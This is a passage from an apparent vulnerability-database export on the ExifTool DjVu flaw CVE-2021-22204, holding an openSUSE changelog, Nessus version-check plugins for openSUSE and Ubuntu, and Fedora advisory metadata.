tag (thanks Jos Roost)\n\n - Decode a few new Panasonic and FujiFilm tags (thanks LibRaw and Greybeard)\n\n - Patched security vulnerability in DjVu reader\n\n - Updated acdsee.config in distribution (thanks StarGeek)\n\n - Recognize AutoCAD DXF files\n\n - More work on experimental JUMBF read support\n\n - More work on experimental JPEG XL read/write support\n\nversion 12.23 :\n\n - Added support for Olympus ORI files\n\n - Added experimental read/write support for JPEG XL images\n\n - Added experimental read support for JUMBF metadata in JPEG and Jpeg2000 images\n\n - Added built-in support for parsing GPS track from Denver ACG-8050 videos with the -ee option\n\n - Added a some new Sony lenses (thanks Jos Roost and LibRaw)\n\n - Changed priority of Samsung trailer tags so the first DepthMapImage takes precedence when -a is not used\n\n - Improved identification of M4A audio files\n\n - Patched to avoid escaping ',' in 'Binary data' message when\n\n -struct is used\n\n - Removed Unknown flag from MXF VideoCodingSchemeID tag\n\n - Fixed -forcewrite=EXIF to apply to EXIF in binary header of EPS files\n\n - API Changes :\n\n + Added BlockExtract option\n\nversion 12.22 :\n\n - Added a few new Sony LensTypes and a new SonyModelID (thanks Jos Roost and LibRaw)\n\n - Added Extra BaseName tag\n\n - Added a new CanonModelID (thanks LibRaw)\n\n - Decode timed GPS from unlisted programs in M2TS videos with the -ee3 option\n\n - Decode more Sony rtmd tags\n\n - Decode some tags for the Sony ILME-FX3 (thanks Jos Roost)\n\n - Allow negative values to be written to XMP-aux:LensID\n\n - Recognize HEVC video program in M2TS files\n\n - Enhanced -b option so --b suppresses tags with binary data\n\n - Improved flexibility when writing GPS coordinates :\n\n + Now pulls latitude and longitude from a combined GPSCoordinates string\n\n + Recognizes the full word 'South' and 'West' to write negative coordinates\n\n - Improved warning when trying to write an integer QuickTime date/time 
tag and Time::Local is not available\n\n - Convert GPSSpeed from mph to km/h in timed GPS from Garmin MP4 videos\n\nversion 12.21 :\n\n - Added a few new iOS QuickTime tags\n\n - Decode a couple more Sony rtmd tags\n\n - Patch to avoid possible 'Use of uninitialized value' warning when attempting to write QuickTime date/time tags with an invalid value\n\n - Fixed problem writing Microsoft Xtra tags\n\n - Fixed Windows daylight savings time patch for file times that was broken in 12.19 (however directory times will not yet handle DST properly)\n\nversion 12.20 :\n\n - Added ability to write some Microsoft Xtra tags in MOV/MP4 videos\n\n - Added two new Canon LensType values (thanks Norbert Wasser)\n\n - Added a new Nikon LensID\n\n - Fixed problem reading FITS comments that start before column 11\n\nversion 12.19 :\n\n - Added -list_dir option\n\n - Added the 'ls-l' Shortcut tag\n\n - Extract Comment and History from FITS files\n\n - Enhanced FilePermissions to include device type (similar to 'ls -l')\n\n - Changed the name of Apple ContentIdentifier tag to MediaGroupUUID (thanks Neal Krawetz)\n\n - Fixed a potential 'substr outside of string' runtime error when reading corrupted EXIF\n\n - Fixed edge case where NikonScanIFD may not be copied properly when copying MakerNotes to another file\n\n - API Changes :\n\n + Added ability to read/write System tags of directories\n\n + Enhanced GetAllGroups() to support family 7 and take optional ExifTool reference\n\n + Changed QuickTimeHandler option default to 1\n\nversion 12.18 :\n\n - Added a new SonyModelID\n\n - Decode a number of Sony tags for the ILCE-1 (thanks Jos Roost)\n\n - Decode a couple of new Canon tags (thanks LibRaw)\n\n - Patched to read differently formatted UserData:Keywords as written by iPhone\n\n - Patched to tolerate out-of-order Nikon MakerNote IFD entries when obtaining tags necessary for decryption\n\n - Fixed a few possible Condition warnings for some NikonSettings tags\n\nversion 12.17 :\n\n - 
Added a new Canon FocusMode value\n\n - Added a new FujiFilm FilmMode value\n\n - Added a number of new XMP-crs tags (thanks Herb)\n\n - Decode a new H264 MDPM tag\n\n - Allow non-conforming lower-case XMP boolean 'true' and 'false' values to be written, but only when print conversion is disabled\n\n - Improved Validate option to warn about non-capitalized boolean XMP values\n\n - Improved logic for setting GPSLatitude/LongitudeRef values when writing\n\n - Changed -json and -php options so the -a option is implied even without the -g option\n\n - Avoid extracting audio/video data from AVI videos when\n -ee\n\n -u is used\n\n - Patched decoding of Canon ContinuousShootingSpeed for newer firmware versions of the EOS-1DXmkIII\n\n - Re-worked LensID patch of version 12.00 (github issue #51)\n\n - Fixed a few typos in newly-added NikonSettings tags (thanks Herb)\n\n - Fixed problem where group could not be specified for PNG-pHYs tags when writing version 12.16 :\n\n - Extract another form of video subtitle text\n\n - Enhanced -ee option with -ee2 and -ee3 to allow parsing of the H264 video stream in MP4 files\n\n - Changed a Nikon FlashMode value\n\n - Fixed problem that caused a failed DPX test on Strawberry Perl\n\n - API Changes :\n\n + Enhanced ExtractEmbedded option\n\nversion 12.15 :\n\n - Added a couple of new Sony LensType values (thanks LibRaw and Jos Roost)\n\n - Added a new Nikon FlashMode value (thanks Mike)\n\n - Decode NikonSettings (thanks Warren Hatch)\n\n - Decode thermal information from DJI RJPEG images\n\n - Fixed extra newline in -echo3 and -echo4 outputs added in version 12.10\n\n - Fixed out-of-memory problem when writing some very large PNG files under Windows\n\nversion 12.14 :\n\n - Added support for 2 more types of timed GPS in video files (that makes 49 different formats now supported)\n\n - Added validity check for PDF trailer dictionary Size\n\n - Added a new Pentax LensType\n\n - Extract metadata from Jpeg2000 Association box\n\n - 
Changed -g:XX:YY and -G:XX:YY options to show empty strings for non-existent groups\n\n - Patched to issue warning and avoid writing date/time values with a zero month or day number\n\n - Patched to avoid runtime warnings if trying to set FileName to an empty string\n\n - Fixed issue that could cause GPS test number 12 to fail on some systems\n\n - Fixed problem extracting XML as a block from Jpeg2000 images, and extract XML tags in the XML group instead of XMP\n\n - Update URL\n\nupdate to 12.13 :\n\n - Add time zone automatically to most string-based QuickTime date/time tags when writing unless the PrintConv option is disabled\n\n - Added -i HIDDEN option to ignore files with names that start with '.'\n\n - Added a few new Nikon ShutterMode values (thanks Jan Skoda)\n\n - Added ability to write Google GCamera MicroVideo XMP tags\n\n - Decode a new Sony tag (thanks LibRaw)\n\n - Changed behaviour when writing only pseudo tags to return an error and avoid writing any other tags if writing FileName fails\n\n - Print 'X image files read' message even if only 1 file is read when at least one other file has failed the -if condition\n\n - Added ability to geotag from DJI CSV log files\n\n - Added a new CanonModelID\n\n - Added a couple of new Sony LensType values (thanks LibRaw)\n\n - Enhanced -csvDelim option to allow '\\t', '\n', '\\r' and '\\\\'\n\n - Unescape '\\b' and '\\f' in imported JSON values\n\n - Fixed bug introduced in 12.10 which generated a 'Not an integer' warning when attempting to shift some QuickTime date/time tags\n\n - Fixed shared-write permission problem with -@ argfile when using -stay_open and a filename containing special characters on Windows\n\n - Added -csvDelim option\n\n - Added new Canon and Olympus LensType values (thanks LibRaw)\n\n - Added a warning if ICC_Profile is deleted from an image (github issue #63)\n\n - EndDir() function for -if option now works when\n -fileOrder is used\n\n - Changed FileSize conversion to use binary 
prefixes since that is how the conversion is currently done (eg. MiB instead of MB)\n\n - Patched -csv option so columns aren't resorted when using -G option and one of the tags is missing from a file\n\n - Fixed incompatiblity with Google Photos when writing UserData:GPSCoordinates to MP4 videos\n\n - Fixed problem where the tags available in a -p format string were limited to the same as the -if[NUM] option when NUM was specified\n\n - Fixed incorrect decoding of SourceFileIndex/SourceDirectoryIndex for Ricoh models\n\nUpdate to 12.10\n\n - Added -validate test for proper TIFF magic number in JPEG EXIF header\n\n - Added support for Nikon Z7 LensData version 0801\n\n - Added a new XMP-GPano tag\n\n - Decode ColorData for the Canon EOS 1DXmkIII\n\n - Decode more tags for the Sony ILCE-7SM3\n\n - Automatically apply QuickTimeUTC option for CR3 files\n\n - Improved decoding of XAttrMDLabel from MacOS files\n\n - Ignore time zones when writing date/time values and using the -d option\n\n - Enhanced -echo3 and -echo4 options to allow exit status to be returned\n\n - Changed -execute so the -q option no longer suppresses the '(ready)' message when a synchronization number is used\n\n - Added ability to copy CanonMakerNotes from CR3 images to other file types\n\n - Added read support for ON1 presets file (.ONP)\n\n - Added two new CanonModelID values\n\n - Added trailing '/' when writing QuickTime:GPSCoordinates\n\n - Added a number of new XMP-crs tags\n\n - Added a new Sony LensType (thanks Jos Roost)\n\n - Added a new Nikon Z lens (thanks LibRaw)\n\n - Added a new Canon LensType\n\n - Decode ColorData for Canon EOS R5/R6\n\n - Decode a couple of new HEIF tags\n\n - Decode FirmwareVersion for Canon M50\n\n - Improved decoding of Sony CreativeStyle tags\n\n - Improved parsing of Radiance files to recognize comments\n\n - Renamed GIF AspectRatio tag to PixelAspectRatio\n\n - Patched EndDir() feature so subdirectories are always processed when -r is used (previously, 
EndDir() would end processing of a directory completely)\n\n - Avoid loading GoPro module unnecessarily when reading MP4 videos from some other cameras\n\n - Fixed problem with an incorrect naming of CodecID tags in some MKV videos\n\n - Fixed verbose output to avoid 'adding' messages for existing flattened XMP tags\n\n - Added a new Sony LensType\n\n - Recognize Mac OS X xattr files\n\n - Extract ThumbnailImage from MP4 videos of more dashcam models\n\n - Improved decoding of a number of Sony tags\n\n - Fixed problem where the special -if EndDir() function didn't work properly for directories after the one in which it was initially called\n\n - Patched to read DLL files which don't have a .rsrc section\n\n - Patched to support new IGC date format when geotagging\n\n - Patched to read DLL files with an invalid size in the header \n\n - Added support for GoPro .360 videos\n\n - Added some new Canon RF and Nikkor Z lenses\n\n - Added some new Sony LensType and CreativeStyle values and decode some ILCE-7C tags\n\n - Added a number of new Olympus SceneMode values\n\n - Added a new Nikon LensID\n\n - Decode more timed metadata from Insta360 videos\n\n - Decode timed GPS from videos of more Garmin dashcam models\n\n - Decode a new GoPro video tag\n\n - Reformat time-only EventTime values when writing and prevent arbitrary strings from being written\n\n - Patched to accept backslashes in SourceFile entries for\n -csv option\n\nupdate to 12.06\n\n - Added read support for Lyrics3 metadata (and fixed problem where APE metadata may be ignored if Lyrics3 exists)\n\n - Added a new Panasonic VideoBurstMode value\n\n - Added a new Olympus MultipleExposureMode value\n\n - Added a new Nikon LensID\n\n - Added back conversions for XMP-dwc EventTime that were removed in 12.04 with a patch to allow time-only values\n\n - Decode GIF AspectRatio\n\n - Decode Olympus FocusBracketStepSize\n\n - Extract PNG iDOT chunk in Binary format with the name AppleDataOffsets\n\n - Process PNG 
images which do not start with mandatory IHDR chunk\n\n - Added a new Panasonic SelfTimer value\n\n - Decode a few more DPX tags\n\n - Extract AIFF APPL tag as ApplicationData\n\n - Fixed bug writing QuickTime ItemList 'gnre' Genre values\n\n - Fixed an incorrect value for Panasonic VideoBurstResolution\n\n - Fixed problem when applying a time shift to some invalid makernote date/time values\n\nupdate to 12.04 :\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Change \n\nupdate to 11.50, see Image-ExifTool-11.50.tar.gz for details\n\nUpdate to version 11.30 :\n\n - Add a new Sony/Minolta LensType.\n\n - Decode streaming metadata from TomTom Bandit Action Cam MP4 videos.\n\n - Decode Reconyx HF2 PRO maker notes.\n\n - Decode ColorData for some new Canon models.\n\n - Enhanced -geotag feature to set AmbientTemperature if available.\n\n - Remove non-significant spaces from some DICOM values.\n\n - Fix possible ''x' outside of string' error when reading corrupted EXIF.\n\n - Fix incorrect write group for GeoTIFF tags.\n\nUpdate to version 11.29\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.27\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.24\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.11 (changes since 11.01) :\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to 11.01 :\n\n - Added a new ProfileCMMType\n\n - Added a Validate warning about non-standard EXIF or XMP in PNG images\n\n - Added a new Canon LensType\n\n - Decode a couple more PanasonicRaw tags\n\n - Patched to avoid adding tags to QuickTime videos with multiple 'mdat' atoms --> avoids potential corruption of these videos!\n\nUpdate to 11.00 :\n\n - Added read support for WTV and DVR-MS videos\n\n - Added print conversions for some ASF date/time tags\n\n - Added a new SonyModelID\n\n - Decode a new PanasonicRaw tag\n\n - Decode some new Sony RX100 VI tags\n\n - 
Made Padding and OffsetSchema tags 'unsafe' so they aren't copied by default\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1185547\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected perl-Image-ExifTool packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ExifTool DjVu ANT Perl injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exiftool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-File-RandomAccess\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-Image-ExifTool\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exiftool-12.25-lp152.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"perl-File-RandomAccess-12.25-lp152.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"perl-Image-ExifTool-12.25-lp152.4.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exiftool / perl-File-RandomAccess / perl-Image-ExifTool\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-23T14:32:29", "description": "The remote Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 host has a package installed that is affected by a vulnerability as referenced in the USN-4987-1 advisory.\n\n - Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image (CVE-2021-22204)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": 
"HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-10T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 : ExifTool vulnerability (USN-4987-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.10", "cpe:/o:canonical:ubuntu_linux:21.04", "p-cpe:/a:canonical:ubuntu_linux:libimage-exiftool-perl"], "id": "UBUNTU_USN-4987-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150692", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4987-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. 
Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150692);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2021-22204\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"USN\", value:\"4987-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 : ExifTool vulnerability (USN-4987-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 host has a package installed that is affected by a vulnerability\nas referenced in the USN-4987-1 advisory.\n\n - Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows\n arbitrary code execution when parsing the malicious image (CVE-2021-22204)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4987-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libimage-exiftool-perl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22204\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ExifTool DjVu ANT Perl injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libimage-exiftool-perl\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04|20\\.04|20\\.10|21\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04 / 20.04 / 20.10 / 21.04', 'Ubuntu ' + release);\nif ( ! 
get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '18.04', 'pkgname': 'libimage-exiftool-perl', 'pkgver': '10.80-1ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'libimage-exiftool-perl', 'pkgver': '11.88-1ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'libimage-exiftool-perl', 'pkgver': '12.05-1ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libimage-exiftool-perl', 'pkgver': '12.16+dfsg-1ubuntu0.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libimage-exiftool-perl');\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-07-28T14:46:52", "description": "ExifTool is a Perl module with an included command-line application for reading and writing meta information in image, audio, and video files. It reads EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP, and ID3 meta information from JPG, JP2, TIFF, GIF, PNG, MNG, JNG, MIFF, EPS, PS, AI, PDF, PSD, BMP, THM, CRW, CR2, MRW, NEF, PEF, ORF, DNG, and many other types of images. 
ExifTool also extracts information from the maker notes of many digital cameras by various manufacturers including Canon, Casio, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon, and Sony. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-05T00:54:11", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: perl-Image-ExifTool-12.16-3.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-05T00:54:11", "id": "FEDORA:DC90B309DE23", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/F6UOBPU3LSHAPRRJNISNVXZ5DSUIALLV/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:52", "description": "ExifTool is a Perl module with an included command-line application for reading and writing meta information in image, audio, and video files. 
It reads EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP, and ID3 meta information from JPG, JP2, TIFF, GIF, PNG, MNG, JNG, MIFF, EPS, PS, AI, PDF, PSD, BMP, THM, CRW, CR2, MRW, NEF, PEF, ORF, DNG, and many other types of images. ExifTool also extracts information from the maker notes of many digital cameras by various manufacturers including Canon, Casio, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon, and Sony. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-05T01:04:48", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: perl-Image-ExifTool-12.16-3.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-05T01:04:48", "id": "FEDORA:E8F5F3053067", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DDKDLJLBTBBR66OOPXSXCG2PQRM5KCZL/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:52", 
"description": "ExifTool is a Perl module with an included command-line application for reading and writing meta information in image, audio, and video files. It reads EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP, and ID3 meta information from JPG, JP2, TIFF, GIF, PNG, MNG, JNG, MIFF, EPS, PS, AI, PDF, PSD, BMP, THM, CRW, CR2, MRW, NEF, PEF, ORF, DNG, and many other types of images. ExifTool also extracts information from the maker notes of many digital cameras by various manufacturers including Canon, Casio, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon, and Sony. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-05T01:23:07", "type": "fedora", "title": "[SECURITY] Fedora 34 